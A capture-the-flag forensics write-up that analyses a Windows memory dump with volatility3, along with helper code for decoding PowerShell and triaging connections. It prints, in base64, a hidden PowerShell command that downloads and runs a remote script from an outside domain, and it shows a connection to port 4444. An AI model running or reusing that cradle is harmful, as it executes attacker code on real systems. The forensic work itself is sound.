htb-santa-ctf/forensics/honeypot/README.md
2021-12-03 17:22:51 +01:00


Honeypot

Santa really encourages people to be on his good list, but sometimes he is a bit naughty himself. He is using a Windows 7 honeypot to capture any suspicious action. Since he is not a forensics expert, can you help him identify any indications of compromise?

  1. Find the full URL used to download the malware.
  2. Find the malicious process's ID.
  3. Find the attacker's IP.

Flag Format: HTB{echo -n "http://url.com/path.foo_PID_127.0.0.1" | md5sum}

Download Link: http://46.101.25.140/forensics_honeypot.zip

Flag

Progress so far

  • The honeypot.zip file contains a Windows memory dump
  • By using the volatility3 framework one can extract data from the dump
  • By checking vol -f honeypot.raw windows.cmdline.CmdLine the malicious process is quite obvious
cat win_cmdline

... snip ...

3504  VBoxTray.exe  "C:\Windows\System32\VBoxTray.exe"
3112  WmiPrvSE.exe  C:\Windows\system32\wbem\wmiprvse.exe
3324  iexplore.exe  "C:\Program Files\Internet Explorer\iexplore.exe"
3344  iexplore.exe  "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3324 CREDAT:14337
2700  powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /window hidden /e aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAaQBuAGQAbwB3AHMAbABpAHYAZQB1AHAAZABhAHQAZQByAC4AYwBvAG0ALwB1AHAAZABhAHQAZQAuAHAAcwAxACcAKQApAA==
3732  conhost.exe  \??\C:\Windows\system32\conhost.exe "288449379-1457209856-1923954052-101100547-172367320720102786213404402731845854479
4028  whoami.exe  Required memory at 0x7ffdf010 is not valid (process exited?)
4036  HOSTNAME.EXE  Required memory at 0x7ffd7010 is not valid (process exited?)
2924  DumpIt.exe  "C:\Users\Santa\Desktop\DumpIt.exe"
2920  conhost.exe  \??\C:\Windows\system32\conhost.exe "280284285205075330588133904-110126809119471720131011406317-845024101-1158882802
168  dllhost.exe  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
  • The base64 string in the PowerShell command decodes to a download of https://windowsliveupdater.com/update.ps1, which serves a rickroll; this has to be the URL
  • The PID of said command is 2700
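To confirm what the encoded argument says without ever executing it, here is an added Python example (my own code, not part of the original writeup) that decodes a PowerShell /e or -EncodedCommand argument the way PowerShell itself does (base64 over UTF-16LE text) and pulls out any URL and download-cradle verb. The command line is the one from the cmdline output above; the helper names and the list of cradle verbs are my own assumptions.

```python
import base64
import re

# Command line of PID 2700 as shown in the windows.cmdline output above
# (copied from the writeup; only the line wrapping has been removed).
CMDLINE = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /window hidden /e '
    "aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAu"
    "AGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAaQBuAGQAbwB3AHMA"
    "bABpAHYAZQB1AHAAZABhAHQAZQByAC4AYwBvAG0ALwB1AHAAZABhAHQAZQAuAHAAcwAxACcAKQApAA=="
)

# -EncodedCommand may be abbreviated (-e, -ec, -enc, ...) and written with / or -.
ENC_ARG_RE = re.compile(
    r"[-/](?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)", re.I
)
URL_RE = re.compile(r"https?://[^\s'\"()<>]+")
# Download-cradle verbs worth flagging in a decoded script (assumed list).
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b", re.I
)


def find_encoded_argument(cmdline):
    """Return the base64 payload passed to -e/-EncodedCommand, or None."""
    m = ENC_ARG_RE.search(cmdline)
    return m.group(1) if m else None


def decode_encoded_command(b64):
    """PowerShell base64-encodes the script as UTF-16LE (no BOM)."""
    return base64.b64decode(b64).decode("utf-16-le")


def analyse_cmdline(cmdline):
    """Decode an encoded PowerShell command line and summarise what it does."""
    b64 = find_encoded_argument(cmdline)
    if b64 is None:
        return {"encoded": False, "script": None, "urls": [], "download_cradle": False}
    script = decode_encoded_command(b64)
    return {
        "encoded": True,
        "script": script,
        "urls": URL_RE.findall(script),
        "download_cradle": bool(CRADLE_RE.search(script)),
    }


if __name__ == "__main__":
    result = analyse_cmdline(CMDLINE)
    print(result["script"])
    print("URLs:", result["urls"], "cradle:", result["download_cradle"])
```

Decoding with plain UTF-8 would give a string full of NUL bytes, which is the usual sign that an encoded command was treated as the wrong encoding; the UTF-16LE step is what makes the script readable.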
  • By examining the currently active connections using vol -f honeypot.raw windows.netscan.NetScan, the following foreign IPs stand out:
Volatility 3 Framework 1.0.1
Offset    Proto LocalAddr LocalPort ForeignAddr ForeignPort State PID Owner Created

0x2554b460  TCPv4 10.0.2.15 49226   93.184.220.29 80  ESTABLISHED - - -
0x261e9d30  TCPv4 10.0.2.15 49228   172.67.177.22 443 ESTABLISHED - - -
0x3e2e9cc0  TCPv4 10.0.2.15 49221   212.205.126.106 443 ESTABLISHED - - -
0x3ee98d80  TCPv4 10.0.2.15 49229   147.182.172.189 4444  ESTABLISHED - - -
0x3f1b0df8  TCPv4 10.0.2.15 49216   212.205.126.106 443 ESTABLISHED - - -
0x3f225df8  TCPv4 10.0.2.15 49222   212.205.126.106 443 ESTABLISHED - - -
0x3f547008  TCPv4 10.0.2.15 49220   212.205.126.106 443 ESTABLISHED - - -
0x3f561438  TCPv4 10.0.2.15 49215   204.79.197.203  443 ESTABLISHED - - -
0x3f57c438  TCPv4 10.0.2.15 49218   95.100.210.141  443 ESTABLISHED - - -
0x3f58b4c8  TCPv4 10.0.2.15 49217   212.205.126.106 443 ESTABLISHED - - -
0x3f58c748  TCPv4 10.0.2.15 49223   212.205.126.106 443 ESTABLISHED - - -
0x3f58e9d8  TCPv4 10.0.2.15 49225   172.67.177.22 443 ESTABLISHED - - -
0x3f5c6df8  TCPv4 10.0.2.15 49219   95.100.210.141  443 ESTABLISHED - - -
  • By eliminating all the IPs that belong to Microsoft we end up with a small set of 5 IPs.
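Rather than eyeballing the table, the same triage can be scripted. The following is an added example (my own code, not from the writeup): it parses NetScan-style output, groups connections by foreign address and flags established sessions on ports outside the ones a workstation normally talks to. The embedded sample is a subset of the table above, and the set of expected ports is an assumption.

```python
import re
from collections import defaultdict

# Sample in the layout of volatility3's windows.netscan.NetScan output;
# the rows are a subset of the table in the writeup above.
NETSCAN_OUTPUT = """\
Volatility 3 Framework 1.0.1
Offset    Proto LocalAddr LocalPort ForeignAddr ForeignPort State PID Owner Created

0x2554b460  TCPv4 10.0.2.15 49226   93.184.220.29 80  ESTABLISHED - - -
0x261e9d30  TCPv4 10.0.2.15 49228   172.67.177.22 443 ESTABLISHED - - -
0x3ee98d80  TCPv4 10.0.2.15 49229   147.182.172.189 4444  ESTABLISHED - - -
0x3f561438  TCPv4 10.0.2.15 49215   204.79.197.203  443 ESTABLISHED - - -
0x3f58b4c8  TCPv4 10.0.2.15 49217   212.205.126.106 443 ESTABLISHED - - -
"""

# Ports a browsing workstation legitimately reaches out to (assumption);
# an ESTABLISHED outbound session on anything else deserves a closer look.
EXPECTED_PORTS = {80, 443}

LINE_RE = re.compile(
    r"^0x[0-9a-f]+\s+(?P<proto>\S+)\s+(?P<laddr>\S+)\s+(?P<lport>\d+)\s+"
    r"(?P<faddr>\S+)\s+(?P<fport>\d+)\s+(?P<state>\S+)"
)


def parse_netscan(text):
    """Return one dict per connection row; banner, header and blanks are skipped."""
    conns = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        row = m.groupdict()
        row["lport"] = int(row["lport"])
        row["fport"] = int(row["fport"])
        conns.append(row)
    return conns


def foreign_addresses(conns):
    """Map each distinct foreign address to the set of ports it was contacted on."""
    by_addr = defaultdict(set)
    for c in conns:
        by_addr[c["faddr"]].add(c["fport"])
    return dict(by_addr)


def suspicious(conns):
    """Established connections whose foreign port is outside EXPECTED_PORTS."""
    return [
        c for c in conns
        if c["state"] == "ESTABLISHED" and c["fport"] not in EXPECTED_PORTS
    ]


if __name__ == "__main__":
    conns = parse_netscan(NETSCAN_OUTPUT)
    for addr, ports in sorted(foreign_addresses(conns).items()):
        print(addr, sorted(ports))
    for c in suspicious(conns):
        print("outlier:", c["faddr"], c["fport"], c["state"])
```

Note that the PID and Owner columns are "-" for every row in this dump, so the table cannot tie a connection back to PID 2700 on its own; the port outlier (4444 is a well-known default reverse-shell listener port) is what singles out 147.182.172.189.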
  • To generate the flag the following shell script was used, sadly with no success.
  • I'm unsure about the ... | md5sum part as this adds a hyphen...
#!/bin/bash
# Try every candidate (url, pid, ip) triple and print the resulting flag.
# md5sum on stdin prints "<hash>  -", so the digest has to be cut out of
# that line before it goes inside HTB{...}.

url="https://windowsliveupdater.com/update.ps1"

list=(
  147.182.172.189 # digital ocean
  #172.67.177.22 # cloudflare net
  #212.205.126.106 # greece
  #93.184.220.29 # edgecast
  #95.100.210.141 # akamai
)

pids=(
  2700 # powershell (the encoded command above)
  1556 # explorer
  2460 # SearchFilterHo
  2856 # explorer
  3324 # iexplorer
  3344 # iexplorer
)

for ip in "${list[@]}"; do
  for pid in "${pids[@]}"; do
    candidate="${url}_${pid}_${ip}"
    echo "Generating flag for $ip and $pid: echo -n \"$candidate\" | md5sum"
    hash=$(echo -n "$candidate" | md5sum | cut -d' ' -f1)
    echo "HTB{$hash}"
  done
done
  • I don't know, maybe the challenge is borked somehow?